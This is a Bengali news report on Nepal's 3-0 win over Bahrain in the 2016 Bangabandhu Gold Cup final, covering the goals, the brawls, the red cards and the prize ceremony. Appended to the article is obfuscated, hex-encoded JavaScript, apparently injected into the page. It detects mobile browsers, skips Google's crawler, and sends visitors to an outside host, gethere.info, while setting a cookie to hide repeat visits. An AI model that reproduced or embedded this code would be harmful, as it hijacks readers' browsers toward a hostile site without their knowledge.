for Add
: ২২ জানুয়ারি ২০১৬, শুক্রবার, ২১:৪৫:৪০
নিজস্ব প্রতিবেদক: বঙ্গবন্ধু গোল্ড কাপ ফুটবল টুর্নামেন্টের নতুন চ্যাম্পিয়ন হয়েছে নেপাল। ফাইনালে ৩-০ গোলের বিশাল ব্যবধানে বাহরাইনকে উড়িয়ে দিয়ে এ শিরোপা জিতে নিয়েছে তারা। সম্প্রতি ভূমিকম্প-বিধ্বস্ত দেশের এই দলটি ১৭ বছর পর এবারই প্রথম কোনো টুর্নামেন্টের ফাইনালে উঠে শিরোপা ঘরে তুলেছে।
শুক্রবার বিকেল ৫টায় বঙ্গবন্ধু জাতীয় স্টেডিয়ামে শুরু হওয়া ম্যাচটি ছিল টানটান উত্তেজনায় ঠাসা। প্রথমার্ধের শুরু থেকে আক্রমণ-পাল্টা আক্রমণে খেলা জমে থাকলেও বিপত্তি ঘটে দ্বিতীয়ার্ধে গিয়ে। দ্বিতীয়ার্ধে ১ গোলে পিছিয়ে থাকা বাহরাইন গোল পরিশোধের চিন্তা বাদ দিয়ে এদিন জড়িয়ে পড়ে মারামারিতে। শেষ পর্যন্ত ফুটবল খেলা গিয়ে দাঁড়িয়ে ছিল অনেকটাই কুস্তি খেলায়। যার ফলাফল হয়েছে, বাহরাইনকে খেলা শেষ করতে হয়েছে ৯ জন নিয়ে আর নেপালকে ১০ জন নিয়ে।
দীর্ঘ ১৭ বছরের খরা কাটিয়ে বঙ্গবন্ধু গোল্ড কাপের শিরোপা জয় করতে চাওয়া নেপাল এদিন প্রথম থেকেই গোল করার সুযোগ খুঁজতে থাকে। সেই সুযোগও পেয়ে যায় প্রধমার্ধের ৫ মিনিটে। আর সুযোগ কাজে লাগিয়ে ২৫ নম্বর জার্সি পরা নেপালের আক্রমণ ভাগের ফুটবলার বিমল মাগাবর দলের পক্ষে করেছেন প্রথম গোল। এরপর দ্বিতীয়ার্ধে গোল শোধে মরিয়া বাহরাইন খেলা ছেড়ে জড়িয়ে পড়ে মারামারিতে। ৪১ মিনিটে নেপালের ১১ নম্বর জার্সি পরা মিডফিল্ডার ও বাহরাইনের ১৪ নম্বর জার্সি পরা ইব্রাহিমের মধ্যে চলা বল দখলের লড়াই গিয়ে রূপ নিয়েছিল দেহ লড়াইয়ে। সেবার সতর্ক করে দিলেও ৭৯ মিনিটে দুই দল আবারও জড়িয়ে পড়ে বিবাদে। এবার বিবাদে জড়িয়েছিল বাহরাইনের আহমেদ আল দুইয়িনি আর নেপালের সুমন লামা। বল ছেড়ে তারা দুইজন মাঠের মধ্যে জড়িয়ে পড়েন কুস্তিতে। এর জন্যে তাদেরকে সেবার আর ক্ষমা করেননি রেফারি। দুইজনকেই লাল কার্ড দেখিয়ে বের করে দিয়েছিলেন মাঠ থেকে।
দুই দলই যখন ১০ জন নিয়ে লড়াইয়ে ছিল তখন দ্বিতীয় গোলের দেখা পায় নেপাল। আগের ম্যাচের হ্যাটট্রিক ম্যান নবযুগ শ্রেষ্ঠা এদিনও জ্বলে উঠে দেখিয়েছেন তার ক্যারিশমা। ৮৬ মিনিটে অঞ্জন বিশার কাট করা বলের সৎ ব্যবহার করে দলের পক্ষে করেছেন শিরোপা নিশ্চিত করা দ্বিতীয় গোল। নির্ধারিত ৯০ মিনিটের কয়েক সেকেন্ড আগে বিমল মাগার উঁচু করে বাড়ানো বলে মাথা ছুঁয়ে দুর্দান্ত এক গোল করে টুর্নামেন্টের সর্বোচ্চ গোলদাতাও হয়েছেন এই শ্রেষ্ঠা। একটি হ্যাটট্রিকসহ এই টুর্নামেন্ট তার গোল সংখ্যা ৫। যার ফলে খেলা শেষে সর্বোচ্চ গোলদাতা যেমন হয়েছেনে তিনি, তেমনি হয়েছেন টুর্নামেন্টের মোস্ট ভ্যাল্যুয়েবল প্লেয়ারও।
অতিরিক্ত ২ মিনিটের সময় পুরো ম্যাচে মারমুখি খেলা বাহরাইন অধিনায়ক আব্দুল আজিজকে লাল কার্ড দেখিয়ে বের করে দিলে ৯ জনের দলে পরিণত হয় বাহরাইন। আর অতিরিক্ত সময় শেষ হলে ৩-০ গোলের বিশাল ব্যবধানে জয় নিয়ে ১৭ বছরের খরা কাটায় নেপাল। সাথে এবারের টুর্নামেন্টে নতুন চ্যাম্পিয়ন হয়ে চমকও সৃষ্টি করেছে এ দলটি। এর আগে সেমিফাইনালে নেপাল ৪-১ গোলের বিশাল ব্যবধানে মালদ্বীপকে হারিয়ে এবং বাহরাইন ১-০ গোলে বাংলাদেশকে হারিয়ে ফাইনালে উঠেছিল।
খেলা শেষে বঙ্গবন্ধু গোল্ড কাপের ফাইনাল ম্যাচে বিজয়ী ও বিজিত দলের মধ্যে পুরস্কার বিতরণ করেন গণপ্রজাতন্ত্রী বাংলাদেশ সরকারের প্রধানমন্ত্রী শেখ হাসিনা। এসময় তার সাথে মঞ্চে উপস্থিত ছিলেন, অর্থমন্ত্রী আবুল মাল আব্দুল মুহিত, ক্রীড়া প্রতিমন্ত্রী বিরেন শিকদার ও বাফুফে সভাপতি সালাহ উদ্দিন আহমেদ। এর আগে তিনি দ্বিতীয়ার্ধের কিছু পর থেকেই গ্যালারিতে বসে খেলা উপভোগ করেন।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add